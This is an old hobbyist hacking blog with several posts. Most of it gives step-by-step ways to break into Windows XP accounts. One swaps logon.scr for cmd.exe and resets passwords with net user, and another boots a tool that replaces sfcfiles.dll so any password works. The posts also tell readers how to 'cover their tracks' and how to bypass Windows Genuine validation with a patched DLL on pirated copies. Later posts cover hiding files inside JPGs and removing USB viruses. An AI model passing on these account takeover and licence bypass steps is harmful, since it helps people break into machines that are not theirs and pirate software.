Winxp HackZ Weblog

How to Hack or Crack a Windows XP Administrator Password

Abdullah Al Maruf — Sun, 25 May 2008 15:07:39 +0000

Windows XP Privilege Escalation Exploit

(Before you continue Read the Updates at the bottom)

Here are the steps involved to Hack the Window XP Administrator Password .

Go to Start –> Run –> Type in CMD
You will get a command prompt. Enter these commands the way it is given
cd\
cd\ windows\system32
mkdir temphack
copy logon.scr temphack\logon.scr
copy cmd.exe temphack\cmd.exe
del logon.scr
rename cmd.exe logon.scr
exit

Wait its not over read the rest to find out how to Hack the Window XP Administrator Password
A Brief explanation of what you are currently doing here is

Your are nagivating to the windows system Directory where the system files are stored. Next your creating a temporary directory called mkdir. After which you are copying or backing up the logon.scr and cmd.exe files into the mkdir then you are deleting the logon.scr file and renaming cmd.exe file to logon.scr.

So basically you are telling windows is to backup the command program and the screen saver file. Then we edited the settings so when windows loads the screen saver, we will get an unprotected dos prompt without logging in. When this appears enter this command

net user password

Example: If the admin user name is clazh and you want change the password to pass Then type in the following command

net user clazh pass

This will chang the admin password to pass.
Thats it you have sucessfully hacked the Window XP Administrator Password now you can Log in, using the hacked Window XP Administrator Password and do whatever you want to do.

Here are the steps involved to De Hack or restore the Window XP Administrator Password to cover your tracks.

Go to Start –> Run –> Type in CMD
You will get a command prompt. Enter these commands the way it is given
cd\
cd\ windows\system32\temphack
copy logon.scr C:\windows\system32\logon.scr
copy cmd.exe C:\windows\system32\cmd.exe
exit

Or simply go to C:\windows\system32\temphack and copy the contents of temphack back into system32 directory click Yes to overwrite the modified files.

Via internetbusinessdaily.net

Note To administrators: You can block the entire password change thing just a little tweak in the local security policy (control panel->administrative tools,works only for administrators group) will disallow any change in password even if u r the Admin (u can put a number of other restrictions too), but be cautious to give other users limitted accounts. After you have done this, the above Screensaver technique will fail.

Update: Christian Mohn points out The Above method is is possible only if you have Local Administrator Privileges. My fault for not checking it up before posting.

Update: The above Method only works if the system is FAT/FAT32 – because of the updated “user rights management” in NTFS – file level rights etc. This does not work on a system using NTFS.

Hack or Crack a Windows XP Administrator Password using OphCrack

Ophcrack is a Windows password cracker based on rainbow tables. It is a very efficient implementation of rainbow tables done by the inventors of the method. It comes with a GTK+ Graphical User Interface and runs on Windows, Mac OS X (Intel CPU) as well as on Linux.

Go to Ophcrack and download the live CD burn it to a disk and boot with it. It will depend on how strong the password is.

Recover the Password using DreamPackPL

Thanks for the steps from marphy

Steps to Hack into a Windows XP Computer without changing password:

Get physical access to the machine. Remember that it must have a CD or DVD drive.
Download DreamPackPL http://www.d–b.webpark.pl/dreampackpl_en.htm
Unzip the downloaded dreampackpl_iso.zip and you’ll get dreampackpl.ISO.
Use any burning program that can burn ISO images.
After you have the disk, boot from the CD or DVD drive. You will see Windows 2000 Setup and it will load some files.
Press “R” to install DreamPackPL.
Press “C” to install DreamPackPL by using the recovery console.
Select the Windows installation that is currently on the computer (Normally is “1? if you only have one Windows installed)
Backup your original sfcfiles.dll by typing: “ren C:\Windows\System32\sfcfiles.dll sfcfiles.lld” (without quotes)
Copy the hacked file from CD to system32 folder. Type: “copy D:\i386\pinball.ex_ C:\Windows\System32\sfcfiles.dll” (without quotes and assuming your CD drive is D:)
Type “exit”, take out disk and reboot.
In the password field, type “dreamon” (without quotes) and DreamPack menu will appear.
Click the top graphic on the DreamPack menu and you will get a menu popup.
Go to commands and enable the options and enable the god command.
Type “god” in the password field to get in Windows.

You can also go to Passwords and select “Logon with wrong password and hash”. This option allows you to login with ANY password.

Note: If you are running any kind of Anti-Virus Tool it will give you a prompt saying that it is a Virus since they have already labelled this tool as a Hack-Tool. A Hack-Tool is NOT a virus. The DreamPackPL helps you bypass the Windows Login screen and it is not destructive.

Recover All Windows Password including Vista with Login Recovery

There are three steps Involved

Download the Login Recovery Software extraction program to create a bootable floppy disk to read the password file.
(click here for a CD version)
Insert the disk into the computer you wish to recover passwords from and boot the computer to extract the encrypted passwords to the disk.
Put the disk into an Internet enabled computer, and upload the encrypted password file for decryption. (see uploads page)

This is a Paid service but Alternativly they Provide a free service which is available by waiting upto 48 hours (Only One free request every three months so be careful how you use it).

How to Install Windows Media Player 11.0 Bypassing Genuine Windows Validation…

Abdullah Al Maruf — Fri, 23 May 2008 05:42:28 +0000

Windows Media Player 11.0 is the latest Media Player by Microsoft. It offers great new ways to store and enjoy all your music, video and pictures along with its new cool look. You must have Windows XP Service Pack-2 (SP2) in order to install Windows Media Player 11.0. But still you will face a problem while installing this new Windows Media Player if your copy of Windows XP is not a genuine (non-pirated) one, since WMP 11.0 installation requires genuine windows validation!!!But there are some tricky steps through which you can install WMP 11.0 even in your pirated copy of windows XP bypassing the genuine windows validation. You just have to follow the following steps one by one:
Download Windows Media Player 11.0 (make sure its the final and latest version, not beta) from the Microsoft Site. Alternatively, you can download the installer file directly from here. Remember you can’t install Windows Media Player 11.0 if service pack 2.0 is not installed in your operating system.
Extract the downloaded Windows Media Player setup file (wmp11-windowsxp-x86-enu.exe) using WinRAR to a directory (wmp11-windowsxp-x86-enu). Now make sure you have a “LegitLibM.dll” file in the extracted “wmp11-windowsxp-x86-enu” folder.
Download the patched LegitLibM.dll and then copy-paste it to the “wmp11-windowsxp-x86-enu” folder and click yes when asked to overwrite.
Now run “setup_wm.exe” file in the “wmp11-windowsxp-x86-enu” folder.
Restart your PC, then run your Windows Media Player and you are done!!!

Trick to hide files in JPG image

Abdullah Al Maruf — Fri, 23 May 2008 05:13:39 +0000

This trick is simple but it is really geeky. Did you know that
you can hiding your files in JPG image? Here I will show you how.
But before we can proceed, prepare our tools first.

Tools

WinRAR
Command Prompt
Hidden files (Eg: password.txt)
A JPG image file (Eg: nerd.jpg)

Ok, now we move on how to do this trick. Btw here is my
nerd.jpg.

1. Put your hidden file and your image file in the same folder.
Here I have password.txt and
nerd.jpg. Both I put in a folder I named it
Secret in drive D.

2. Put all these files into a RAR archive. I named this archive
as Hidden.rar

3. Open Command Prompt and go to the folder
where you place the files. Type the following command,

copy /b nerd.jpg + hidden.rar cool.jpg

where nerd.jpg is our original image file,
hidden.rar is our RAR archive and
cool.jpg is the JPG image file that we want to
create.

4. Now you will have 4 files in the folder.
nerd.jpg, password.txt, hidden.rar and cool.jpg

5. If you open cool.jpg file, you will see the
same image like nerd.jpg.

6. If you open cool.jpg file with WinRAR, here is what you will
get.

Secret files in JPG image file.

7. Below is my cool.jpg image file. Try open the file with WinRAR
and read what I wrote in the password.txt file.

Btw if you want to make it more secure, use encryption when you
create the archive file.

Removing the ntde1ect.com and autorun.inf files

Abdullah Al Maruf — Fri, 23 May 2008 05:08:27 +0000

There is a trojan/virus (either the Win32/Pacex virus or the Win32/PSW.Agent.NDP trojan) that uses those two files. Here is how you can get rid of them:

1) Open up Task Manager (Ctrl-Alt-Del)

2) If wscript.exe is running, end it.

3) If explorer.exe is running, end it.

4) Open up “File | New Task (Run)” in the Task manager

5) Run cmd

6) Run the following command on all your drives by replacing c: with other drives in turn (note: if you have autorun.inf files that you think you need to backup, do so now):

del c:autorun.* /f /a /s /q

7) Go to your WindowsSystem32 directory by typing cd c:windowssystem32

Type dir /a avp*.*

9) If you see any files names avp0.dll or avpo.exe or avp0.exe, use the following commands to delete each of them:

attrib -r -s -h avpo.exedel avpo.exe

10) Use the Task Manager’s Run command to fire up regedit

11) Navigate to HKEY_CURRENT_USER SOFTWARE Microsoft Windows CurrentVersion Run (as usual, take a backup of your registry before touching it!)

12) If there are any entries for avpo.exe, delete them.

13) Do a complete search of your registry for ntde1ect.com and delete any entries you find.

14) Restart your computer

Fix some virus

Abdullah Al Maruf — Fri, 23 May 2008 05:04:51 +0000

Fix some virus which comes from Usb drives and effected the computers

1. goto http://anamarphy.googlepages.com

2. then press @Enter tab

3.then press @Download tab

4. Download the simple Virus removing Tools.

If works or further help leave a comment.

I’ll try to help you guy z….

Marphy2k